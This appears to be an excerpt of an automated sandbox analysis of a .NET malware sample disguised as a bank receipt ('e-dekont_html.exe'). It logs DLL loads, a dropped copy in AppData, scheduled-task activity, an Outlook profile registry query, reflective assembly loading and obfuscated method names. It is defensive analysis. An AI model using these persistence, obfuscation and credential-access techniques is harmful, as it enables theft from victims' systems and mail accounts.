                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: e-dekont_html.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: e-dekont_html.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: e-dekont_html.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bbvK.pdbSHA256 source: e-dekont_html.exe, fahKSvwo.exe.0.dr
                Source: Binary string: bbvK.pdb source: e-dekont_html.exe, fahKSvwo.exe.0.dr

                Data Obfuscation

                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.cs  .Net Code: VkBiqP4YpLfsTOKK1C5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.cs  .Net Code: VkBiqP4YpLfsTOKK1C5 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\e-dekont_html.exe  Code function: 0_2_012BF228 push ebx; retn 0002h  0_2_012BF242
                Source: C:\Users\user\Desktop\e-dekont_html.exe  Code function: 0_2_012BF2BF push edi; retn 0002h  0_2_012BF2CA
                Source: C:\Users\user\Desktop\e-dekont_html.exe  Code function: 0_2_012BF2B0 push esi; retn 0002h  0_2_012BF2BA
                Source: C:\Users\user\Desktop\e-dekont_html.exe  Code function: 0_2_08F0EAB0 push ss; ret  0_2_08F0EABA
                Source: C:\Users\user\Desktop\e-dekont_html.exe  Code function: 0_2_08F0BA7F push eax; retf  0_2_08F0BAA5
                Source: C:\Users\user\Desktop\e-dekont_html.exe  Code function: 8_2_02BE9C30 push esp; retf 02C7h  8_2_02BE9D55
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe  Code function: 13_2_01599C30 push esp; retf 015Bh  13_2_01599D55
                Source: e-dekont_html.exe  Static PE information: section name: .text entropy: 7.952098121903517
                Source: fahKSvwo.exe.0.dr  Static PE information: section name: .text entropy: 7.952098121903517
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, WwWQAaqqrVa5qkcNhnJ.cs  High entropy of concatenated method names: 'aEoj4vB4IJ', 'tbpjzF9BZI', 'm4yfZ8ojyk', 'fP9f3wxYAm', 'y3GfIP9Pdc', 'DWWfgOjR96', 'RIRfcMcAio', 'n34fnOvjL7', 'HXefLwr00R', 'N13f0AJEjN'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, PeiRoUhVi14ZtfH37r.cs  High entropy of concatenated method names: 'BirwYxR4D8', 'WgZwsYymM4', 'ToString', 'WrkwLrT3si', 'C55w0VtyhE', 'NacwRcRLcu', 'RYKw1NfMO2', 'r9AwNRcqdf', 'pEgwasgbX4', 'swqwW7Wi3l'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, T7geawTVduRubgjl6k.cs  High entropy of concatenated method names: 'ToString', 'N2NOG0wHr7', 'LOmO5h582G', 'DuUOqyefj7', 'wjXOT2awq5', 'op7OVOxGbF', 'R5tOE9G6ju', 'qNkOdBl6WV', 'zjROk8pXXV', 'bUxOpW0eQg'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, Mx1CEBI3fhAT2luVA2.cs  High entropy of concatenated method names: 'VhWhU39LZp', 'SZPhwVoH4F', 'w4QhhuSOi4', 'ouyhf0VOQf', 'ihUhQY1v87', 'V1fhHnPIh9', 'Dispose', 'fRj9LPGTwo', 'ePJ90Cbvy0', 'sFG9RkXdBd'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, gAT7eoJMygn6gjWsIx.cs  High entropy of concatenated method names: 'aUo0C06IhH', 'N6R0J6ALlI', 'zVZ0tbc8Vc', 'rYD0S9p8Ti', 'gR90KplyIY', 'XS10x8J3uy', 'Gpk0oa0Dkc', 'FOb07Xngpj', 'aUs0iv8bjl', 'Bur04DrePt'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.cs  High entropy of concatenated method names: 'Yh0gnuxnxb', 'DMJgLUJSvT', 'mhrg06qPKL', 'W8FgRPVdo1', 'jeKg1NpI80', 'oexgNeeEIY', 'wOsgaITM1u', 'tBEgWQYZsa', 'MOhg8f4SGa', 'Gr7gYmIXUp'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, cGA342shoG3dnMmo4W.cs  High entropy of concatenated method names: 'fUOw78v1fh', 'RNHw46ghuh', 'wvd9ZomAx4', 'RXq93d8Z3R', 'YLnwGujPHR', 'Gf9wbAiHBb', 's7OwuAwIV8', 'Sw6wCn6Etw', 'QmpwJJnC73', 'gRhwtfNPSK'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, lovJ0czClo5OP1EZ5p.cs  High entropy of concatenated method names: 'EvQjMENxho', 'NXMjrXYoR6', 'WcvjB7Mo8C', 'jUyjlfv20k', 'UZGj5hOnPC', 'BaojT1hka6', 'NutjVt2u5h', 'YGxjHcj8Nr', 'NdPjD7cDDf', 'matjyMws2t'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, tMpAMrZVOPEtwJuQTS.cs  High entropy of concatenated method names: 'RymNntqYrb', 'zJtN0YWdsf', 'tB0N1IjBCV', 'PwPNa6ZKF4', 'CxmNWe8cvj', 'tRH1KPMfdV', 'pZm1x1MgL1', 'p4l1oDGHeM', 'W4417ff7FA', 'pZT1iG8Ejj'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, y2xvJk7MqDGjCSRLHi.cs  High entropy of concatenated method names: 't973aZA8OM', 'WP83WJIG5m', 'nA13YsO076', 'ESU3s8TwAm', 'GPc3U3QTsk', 'l6t3OVWisM', 'j1oqxVG2dtRxF1TQY5', 'OPESoh54pRnUVMRmS5', 'kfN33KKK2G', 'gMF3gsyxxw'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, VbMlbdf1ymu5YPDwdh.cs  High entropy of concatenated method names: 'BKfAM5Ilg', 'MYi6OFBF2', 'OYHMla2fb', 'xg3FEeNsq', 'lgIBXVH8y', 'BMFmk52Nl', 'LaVSSSpUpJxc5XEJyb', 'fGsfPoM0NpdrLOHYIK', 'd459hmf7r', 'LnKj5QRNo'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, nNUAPLSS6OVAMReiLp.cs  High entropy of concatenated method names: 'nSGaDPOPmG', 'n2caypalRO', 'HfBaAaZxd1', 'PeIa6xtE7a', 'Qr3aPpmRJE', 'nQVaM75VCy', 'agIaFcaQ80', 'QW6ar8INMp', 'SeaaBk8JpB', 'mFSamxaHWi'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, qWBbWjHPNSm3x3ymNh.cs  High entropy of concatenated method names: 'oiSR6kVV8l', 'rOPRMq5hBW', 'lMtRrE7Srf', 'PaERBVW4DW', 'FACRUq0pIv', 'QD9ROdqwFD', 'lbVRwFhUJG', 'f4xR9SYjSD', 'HWXRhAxHn6', 'tXORj0DbvO'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, OktkoHOIC8r5JCWFWx.cs  High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'I6qIisSfio', 'CfXI4ZYj7P', 'lsaIzh6iWn', 'OGEgZqGbqB', 'NPGg3IQ8Yp', 'xXDgIkJQKy', 'weUggWJXBM', 'LtfdsT4bbJRtGbTDNe9'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, pu7Lw9pOUtJRgB67V4.cs  High entropy of concatenated method names: 'YQvUXvU4Dc', 'bTBUbwPr7S', 'k0ZUCOd5f8', 'Pg9UJTjZPO', 'jY9U5k9GMG', 'fyLUqaZ7Xg', 'yNbUTXsSfK', 'XmdUVJa98e', 'gq8UE9w6IF', 'cXSUd5s6OI'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, Pe0SkjXKZwcNC8GV5H.cs  High entropy of concatenated method names: 'uMZaLKWh9d', 'c8waRCi1df', 'GoGaNSDvbS', 'NakN46s9ti', 'kuQNzBUL1d', 'e4ZaZfSYa1', 'z0ua3br3H9', 'gP6aIwv9Nu', 'FS2agyaaEN', 'Y5oac3Z7n6'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, MuYu9FovasFrZDt22m.cs  High entropy of concatenated method names: 'zfpjR5ToCM', 'WY4j134dMx', 'WVdjN1864o', 'HaljaMcg29', 'STEjhunQt3', 'bS6jWlAXYX', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, EE0buaqyZiM121J1NhK.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kZljGK2xJa', 'bsmjbxY9gY', 'dR9juYxrFg', 'WJpjCga0Lq', 'YFCjJgfLsV', 'wlBjtmnD2B', 'k1KjS6owbB'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, MkK5y6vwJZjs5JDWtI.cs  High entropy of concatenated method names: 'wSn2rURJAE', 'pnR2BHKNVh', 'C462lj2EGM', 'RMY25YbEsp', 'L2O2TGf2NJ', 'MJR2Vvr9MC', 'JcA2dpcAU0', 'khm2kb5yuS', 'O5j2XZwHS9', 'Fpg2G8Hv8T'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, w6fVOnaEhaOjHBKUqm.cs  High entropy of concatenated method names: 'vCJaORo2iZ7h9HgmlHY', 'wpYXgxo6VkkBLSHtGx4', 'yJkN939xYd', 'r4ZNhbYqF9', 'GAdNjfe4B8', 'GojxD1ogmuWO0gmFaJL', 'DUikTCoH1sOrluF5Aao'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, JLoSIhwA97O7XLgyC7.cs  High entropy of concatenated method names: 'Dispose', 'u7s3ip9b0q', 'HIsI5qVWua', 'PQGvKUhrk2', 'drf34d0xPF', 'yBd3zNTJF5', 'ProcessDialogKey', 'ht9IZYc6hA', 'gZEI3SUHIm', 'hCxIIot7Hh'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, VtsXqUbvS3rdPxQGMo.cs  High entropy of concatenated method names: 'LvKhl7BSXy', 'kNxh5VoL3m', 'RTIhqnLPI7', 'H13hT8gA18', 'xiQhVC0Zbg', 'IjfhEWJIcW', 'WbihdqoDdO', 'JUMhkMMNeB', 'U7fhpxcFKU', 'UPwhXQtc5f'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, dHRLn7q7YB03FnCZfRs.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQkvhllP1m', 'vBcvjUsDuw', 'adjvfcQVj6', 'rf9vv9X715', 'fXvvQu8DDh', 'xSyveUxkIQ', 'lgYvHNyPSK'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, WwWQAaqqrVa5qkcNhnJ.cs  High entropy of concatenated method names: 'aEoj4vB4IJ', 'tbpjzF9BZI', 'm4yfZ8ojyk', 'fP9f3wxYAm', 'y3GfIP9Pdc', 'DWWfgOjR96', 'RIRfcMcAio', 'n34fnOvjL7', 'HXefLwr00R', 'N13f0AJEjN'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, PeiRoUhVi14ZtfH37r.cs  High entropy of concatenated method names: 'BirwYxR4D8', 'WgZwsYymM4', 'ToString', 'WrkwLrT3si', 'C55w0VtyhE', 'NacwRcRLcu', 'RYKw1NfMO2', 'r9AwNRcqdf', 'pEgwasgbX4', 'swqwW7Wi3l'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, T7geawTVduRubgjl6k.cs  High entropy of concatenated method names: 'ToString', 'N2NOG0wHr7', 'LOmO5h582G', 'DuUOqyefj7', 'wjXOT2awq5', 'op7OVOxGbF', 'R5tOE9G6ju', 'qNkOdBl6WV', 'zjROk8pXXV', 'bUxOpW0eQg'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, Mx1CEBI3fhAT2luVA2.cs  High entropy of concatenated method names: 'VhWhU39LZp', 'SZPhwVoH4F', 'w4QhhuSOi4', 'ouyhf0VOQf', 'ihUhQY1v87', 'V1fhHnPIh9', 'Dispose', 'fRj9LPGTwo', 'ePJ90Cbvy0', 'sFG9RkXdBd'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, gAT7eoJMygn6gjWsIx.cs  High entropy of concatenated method names: 'aUo0C06IhH', 'N6R0J6ALlI', 'zVZ0tbc8Vc', 'rYD0S9p8Ti', 'gR90KplyIY', 'XS10x8J3uy', 'Gpk0oa0Dkc', 'FOb07Xngpj', 'aUs0iv8bjl', 'Bur04DrePt'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.cs  High entropy of concatenated method names: 'Yh0gnuxnxb', 'DMJgLUJSvT', 'mhrg06qPKL', 'W8FgRPVdo1', 'jeKg1NpI80', 'oexgNeeEIY', 'wOsgaITM1u', 'tBEgWQYZsa', 'MOhg8f4SGa', 'Gr7gYmIXUp'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, cGA342shoG3dnMmo4W.cs  High entropy of concatenated method names: 'fUOw78v1fh', 'RNHw46ghuh', 'wvd9ZomAx4', 'RXq93d8Z3R', 'YLnwGujPHR', 'Gf9wbAiHBb', 's7OwuAwIV8', 'Sw6wCn6Etw', 'QmpwJJnC73', 'gRhwtfNPSK'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, lovJ0czClo5OP1EZ5p.cs  High entropy of concatenated method names: 'EvQjMENxho', 'NXMjrXYoR6', 'WcvjB7Mo8C', 'jUyjlfv20k', 'UZGj5hOnPC', 'BaojT1hka6', 'NutjVt2u5h', 'YGxjHcj8Nr', 'NdPjD7cDDf', 'matjyMws2t'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, tMpAMrZVOPEtwJuQTS.cs  High entropy of concatenated method names: 'RymNntqYrb', 'zJtN0YWdsf', 'tB0N1IjBCV', 'PwPNa6ZKF4', 'CxmNWe8cvj', 'tRH1KPMfdV', 'pZm1x1MgL1', 'p4l1oDGHeM', 'W4417ff7FA', 'pZT1iG8Ejj'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, y2xvJk7MqDGjCSRLHi.cs  High entropy of concatenated method names: 't973aZA8OM', 'WP83WJIG5m', 'nA13YsO076', 'ESU3s8TwAm', 'GPc3U3QTsk', 'l6t3OVWisM', 'j1oqxVG2dtRxF1TQY5', 'OPESoh54pRnUVMRmS5', 'kfN33KKK2G', 'gMF3gsyxxw'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, VbMlbdf1ymu5YPDwdh.cs  High entropy of concatenated method names: 'BKfAM5Ilg', 'MYi6OFBF2', 'OYHMla2fb', 'xg3FEeNsq', 'lgIBXVH8y', 'BMFmk52Nl', 'LaVSSSpUpJxc5XEJyb', 'fGsfPoM0NpdrLOHYIK', 'd459hmf7r', 'LnKj5QRNo'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, nNUAPLSS6OVAMReiLp.cs  High entropy of concatenated method names: 'nSGaDPOPmG', 'n2caypalRO', 'HfBaAaZxd1', 'PeIa6xtE7a', 'Qr3aPpmRJE', 'nQVaM75VCy', 'agIaFcaQ80', 'QW6ar8INMp', 'SeaaBk8JpB', 'mFSamxaHWi'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, qWBbWjHPNSm3x3ymNh.cs  High entropy of concatenated method names: 'oiSR6kVV8l', 'rOPRMq5hBW', 'lMtRrE7Srf', 'PaERBVW4DW', 'FACRUq0pIv', 'QD9ROdqwFD', 'lbVRwFhUJG', 'f4xR9SYjSD', 'HWXRhAxHn6', 'tXORj0DbvO'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, OktkoHOIC8r5JCWFWx.cs  High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'I6qIisSfio', 'CfXI4ZYj7P', 'lsaIzh6iWn', 'OGEgZqGbqB', 'NPGg3IQ8Yp', 'xXDgIkJQKy', 'weUggWJXBM', 'LtfdsT4bbJRtGbTDNe9'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, pu7Lw9pOUtJRgB67V4.cs  High entropy of concatenated method names: 'YQvUXvU4Dc', 'bTBUbwPr7S', 'k0ZUCOd5f8', 'Pg9UJTjZPO', 'jY9U5k9GMG', 'fyLUqaZ7Xg', 'yNbUTXsSfK', 'XmdUVJa98e', 'gq8UE9w6IF', 'cXSUd5s6OI'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, Pe0SkjXKZwcNC8GV5H.cs  High entropy of concatenated method names: 'uMZaLKWh9d', 'c8waRCi1df', 'GoGaNSDvbS', 'NakN46s9ti', 'kuQNzBUL1d', 'e4ZaZfSYa1', 'z0ua3br3H9', 'gP6aIwv9Nu', 'FS2agyaaEN', 'Y5oac3Z7n6'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, MuYu9FovasFrZDt22m.cs  High entropy of concatenated method names: 'zfpjR5ToCM', 'WY4j134dMx', 'WVdjN1864o', 'HaljaMcg29', 'STEjhunQt3', 'bS6jWlAXYX', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, EE0buaqyZiM121J1NhK.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kZljGK2xJa', 'bsmjbxY9gY', 'dR9juYxrFg', 'WJpjCga0Lq', 'YFCjJgfLsV', 'wlBjtmnD2B', 'k1KjS6owbB'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, MkK5y6vwJZjs5JDWtI.cs  High entropy of concatenated method names: 'wSn2rURJAE', 'pnR2BHKNVh', 'C462lj2EGM', 'RMY25YbEsp', 'L2O2TGf2NJ', 'MJR2Vvr9MC', 'JcA2dpcAU0', 'khm2kb5yuS', 'O5j2XZwHS9', 'Fpg2G8Hv8T'
